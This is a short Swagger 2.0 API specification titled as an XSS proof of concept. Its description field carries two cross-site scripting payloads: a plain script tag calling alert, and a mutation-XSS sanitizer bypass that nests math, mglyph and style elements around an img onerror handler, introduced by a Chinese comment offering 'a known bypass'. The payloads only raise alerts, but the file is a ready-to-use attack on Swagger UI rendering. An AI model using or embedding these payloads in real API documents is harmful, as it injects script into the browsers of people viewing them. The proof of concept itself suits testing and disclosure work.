swagger: '2.0'
info:
  title: Swagger XSS PoC
  description: |
    <details><summary></summary><script>alert('XSS')</script></details>
    <!-- 或使用已知绕过 -->
    <math><mtext><table><mglyph><style><!--</style><img title="-->&lt;img src=1 onerror=alert(1)&gt;"></mglyph></table></mtext></math>
  version: test
paths:
  /test:
    get:
      summary: Test
      responses:
        '200':
          description: OK
